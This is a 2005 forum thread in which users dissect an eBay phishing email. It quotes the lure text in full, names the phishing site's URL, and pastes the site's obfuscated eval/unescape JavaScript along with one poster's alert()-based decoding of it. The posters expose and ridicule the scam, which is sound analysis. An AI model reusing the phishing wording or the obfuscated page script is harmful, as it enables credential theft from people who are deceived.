HOLY BLEEP! Evil Spammer/Phisher!!!

Started by Darren Dirt, October 05, 2005, 02:53:21 PM

Previous topic - Next topic
Print
Go Down Pages1
User actions

Darren Dirt

October 05, 2005, 02:53:21 PM
Oh, what evil... So here's the spam I just got:



- - -



Dear ebay member,





For the User Agreement, Section 9, we may immediately issue a warning, temporarily suspend, indefinitely suspend or terminate your membership and refuse to provide our services to you if we believe that your actions may cause financial loss or legal liability for you, our users or us. We may also take these actions if we are unable to verify or authenticate any information you provide to us.



We regret to inform you that your eBay account could be suspended if you don't re-update your account information. To resolve this problems please use the link below and re-enter your account information. If your problems could not be resolved your account will be suspended for a period of 48 hours, after this period your account will be terminated.





Due to the suspension of this account, please be advised you are prohibited from using eBay in any way. This includes the registering of a new account. Please note that this suspension does not relieve you of your agreed-upon obligation to pay any fees you may owe to eBay.



To update your record please click here:



[Respond Now]



Attention number: 4766133494

Security details: Notification of Unauthorized Account Access





- - -



So the link to allegedly "update my eBay account" is a button, I do a view-partial-source, it goes here:



http://chase-registr.com/eBayISAPI/index.htm



Click the link, nothing bad happens, but their bad web dev job reveals the villainy, even to non-techies :o Evil Bastages!  :evil:



Oh, and if you enter pretty much ANY garbage in the username/password, you get this priceless gem:



http://chase-registr.com/eBayISAPI/SecurityMeasures.php



- - -



Gee, do you think there's something a bit questionable happening in the Javascript?

Code Select
<script language="JavaScript" type="text/javascript"><!--

var h="+rg&.3fv_m2Hd0P%s)(El=zw>tSnou<-p hy4xBA9W?T6/18;eibLJ:IcajC\"7M",g="",x=63,c="";eval(unescape("%66%75%6E%63%74%69%6F%6E%20%69%28%79%29%7B%76%61%72%20%66%3D%27%27%2C%7A%2C%71%2C%77%2C%76%3B%66%6F%72%28%7A%3D%30%3B%7A%3C%79%2E%6C%65%6E%67%74%68%3B%7A%2B%2B%29%7B%71%3D%79%2E%63%68%61%72%41%74%28%7A%29%3B%77%3D%68%2E%69%6E%64%65%78%4F%66%28%71%29%3B%69%66%28%77%3E%2D%31%29%7B%76%3D%28%28%77%2B%31%29%25%78%2D%31%29%3B%69%66%28%76%3C%3D%30%29%7B%76%2B%3D%78%7D%66%2B%3D%68%2E%63%68%61%72%41%74%28%76%2D%31%29%7D%65%6C%73%65%7B%66%2B%3D%71%7D%7D%63%2B%3D%66%7D%3B%66%75%6E%63%74%69%6F%6E%20%6A%6A%6A%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%63%29%3B%67%3D%22%22%7D"));i("h-)agb Sh=jo&<j&iz7:j_jnagb S7hS4 iz7SiBS1Cj_j)agb S7t\r\n_jgh_<=omB,h_<=om4,h_<=om>,h_<=omye\r\nv<oaSbuoh_<=omaj=aE(h{\r\n_jghguuSzh0ua<2ioS[hE0ua<2ioS3au2 jS+u0izz'\"nn8\"u2 jS'(hTh'0ua<2ioSl=i2ioS'hIh'Lu04'h]e\r\n_<=omBzh>bo0u>3)agiioJivSr/;e\r\n_<=om4zh>bo0u>3)agiio6u p8We\r\n11_<=om>zhxHPe\r\n_<=om>zhguuS3uvv)iS?b0SypHHPe\r\n_<=omyzh8Me\r\n_<=om)yu>E(e\r\n}\r\n_jgh_<=om>boe\r\nv<oaSbuoh_<=om u E(\r\n{\r\n_<=om>bozh>bo0u>3agijSi%u < E(e\r\n_<=om>bo30ua<2ioS3Lu043booigd6+Jzh_<=omyS2=e\r\n_<=o");i("m>bo30ua<2ioS3Lu043)S4=i32jg&bozhPe\r\n_<=om>bo30ua<2ioS3Lu043uo<o=uj0zh_<=om u e\r\n_<=om)yu>E(e\r\n}\r\nv<oaSbuoh_<=om)yu>E(\r\n{\r\nbvhE_<=om>bo(h_<=om>bo3)yu>E_<=omB,h_<=om4,h_<=om>,h_<=omy(e\r\n}\r\n_jgh_<=omyS2=zh'\\Bf\"0b_h)S4=iz7yib&ySIh8PPseh=boipyib&ySIh8M BehvuoSpvj2b=4Ih\\'6jyu2j\\',h)jo)p)igbvehvuoSp)bwiIh; Se7tySS )I11)b&obo3iLj43au21>)1iAj4cn9%c30==Tnb&oco.)b0z_igbv4.aum jgSoigc0zH.)bSib0zP\\Bf\"10b_t'e\r\nbvhE>bo0u>3agijSi%u < (h{h_<=omaj=aE(eh_<=om u E(eh>bo0u>3)iScoSig_j=E_<=om");i("aj=a,h8(eh}\r\n-1)agb Sth");jjj();document.write(g);g="";//--></script>
_____________________

Strive for progress. Not perfection.
_____________________

Mr. Analog

#1
October 05, 2005, 03:07:49 PM
Ha, man these phishers have no pride at all eh?



I'd totally try the "One of your credit card numbers might be lucky! Just send me your card numbers and at the end of each month, if you are lucky, you could win up to $100!" ;)
By Grabthar's Hammer

Darren Dirt

#2
October 05, 2005, 03:11:36 PM
Shameless. Idiots, creative but poor codeers, and shameless. :P





I took screenshots of page1 and page2 -- since I doubt that site will be live for much longer...



PS: really funny, open either page, and MINIMIZE, watch what happens to the "address bar" :rolleyes:







_____________________

Strive for progress. Not perfection.
_____________________

Darren Dirt

#3
October 05, 2005, 03:19:15 PM
Just did some quick reverse engineering , i.e. alert() instead of document.write() or eval()...



"crack'd version" -- save as something.html and launch it to see what trickery was behind the Code...



Code Select

<script language="JavaScript" type="text/javascript"><!--



var h="+rg&.3fv_m2Hd0P%s)(El=zw>tSnou<-p hy4xBA9W?T6/18;eibLJ:IcajC\"7M",

g="",

x=63,

c="";



var SOME_STUPID_SECRET_CODE="%66%75%6E%63%74%69%6F%6E%20%69%28%79%29%7B%76%61%72%20%66%3D%27%27%2C%7A%2C%71%2C%77%2C%76%3B%66%6F%72%28%7A%3D%30%3B%7A%3C%79%2E%6C%65%6E%67%74%68%3B%7A%2B%2B%29%7B%71%3D%79%2E%63%68%61%72%41%74%28%7A%29%3B%77%3D%68%2E%69%6E%64%65%78%4F%66%28%71%29%3B%69%66%28%77%3E%2D%31%29%7B%76%3D%28%28%77%2B%31%29%25%78%2D%31%29%3B%69%66%28%76%3C%3D%30%29%7B%76%2B%3D%78%7D%66%2B%3D%68%2E%63%68%61%72%41%74%28%76%2D%31%29%7D%65%6C%73%65%7B%66%2B%3D%71%7D%7D%63%2B%3D%66%7D%3B%66%75%6E%63%74%69%6F%6E%20%6A%6A%6A%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%63%29%3B%67%3D%22%22%7D";



alert(unescape(SOME_STUPID_SECRET_CODE));



eval(unescape(SOME_STUPID_SECRET_CODE));



i("h-)agb Sh=jo&<j&iz7:j_jnagb S7hS4 iz7SiBS1Cj_j)agb S7t\r\n_jgh_<=omB,h_<=om4,h_<=om>,h_<=omye\r\nv<oaSbuoh_<=omaj=aE(h{\r\n_jghguuSzh0ua<2ioS[hE0ua<2ioS3au2 jS+u0izz'\"nn8\"u2 jS'(hTh'0ua<2ioSl=i2ioS'hIh'Lu04'h]e\r\n_<=omBzh>bo0u>3)agiioJivSr/;e\r\n_<=om4zh>bo0u>3)agiio6u p8We\r\n11_<=om>zhxHPe\r\n_<=om>zhguuS3uvv)iS?b0SypHHPe\r\n_<=omyzh8Me\r\n_<=om)yu>E(e\r\n}\r\n_jgh_<=om>boe\r\nv<oaSbuoh_<=om u E(\r\n{\r\n_<=om>bozh>bo0u>3agijSi%u < E(e\r\n_<=om>bo30ua<2ioS3Lu043booigd6+Jzh_<=omyS2=e\r\n_<=o");



i("m>bo30ua<2ioS3Lu043)S4=i32jg&bozhPe\r\n_<=om>bo30ua<2ioS3Lu043uo<o=uj0zh_<=om u e\r\n_<=om)yu>E(e\r\n}\r\nv<oaSbuoh_<=om)yu>E(\r\n{\r\nbvhE_<=om>bo(h_<=om>bo3)yu>E_<=omB,h_<=om4,h_<=om>,h_<=omy(e\r\n}\r\n_jgh_<=omyS2=zh'\\Bf\"0b_h)S4=iz7yib&ySIh8PPseh=boipyib&ySIh8M BehvuoSpvj2b=4Ih\\'6jyu2j\\',h)jo)p)igbvehvuoSp)bwiIh; Se7tySS )I11)b&obo3iLj43au21>)1iAj4cn9%c30==Tnb&oco.)b0z_igbv4.aum jgSoigc0zH.)bSib0zP\\Bf\"10b_t'e\r\nbvhE>bo0u>3agijSi%u < (h{h_<=omaj=aE(eh_<=om u E(eh>bo0u>3)iScoSig_j=E_<=om");



i("aj=a,h8(eh}\r\n-1)agb Sth");



//jjj();

alert(c);



//alert(g);



//g="";



//--></script>
_____________________

Strive for progress. Not perfection.
_____________________

Thorin

#4
October 05, 2005, 04:00:58 PM
chase-registr.com is registered in Brooklyn, apparently...
Prayin' for a 20!

gcc thorin.c -pedantic -o Thorin
compile successful

Darren Dirt

#5
October 05, 2005, 04:06:59 PM
[cynical]more like "Crooklyn"[/cynical]
_____________________

Strive for progress. Not perfection.
_____________________

Thorin

#6
October 05, 2005, 04:35:50 PM
Yeah.  And not surprisingly, registered only a few days ago.  Gee, I wonder if the contact information is false?
Prayin' for a 20!

gcc thorin.c -pedantic -o Thorin
compile successful
Print
Go Up Pages1
User actions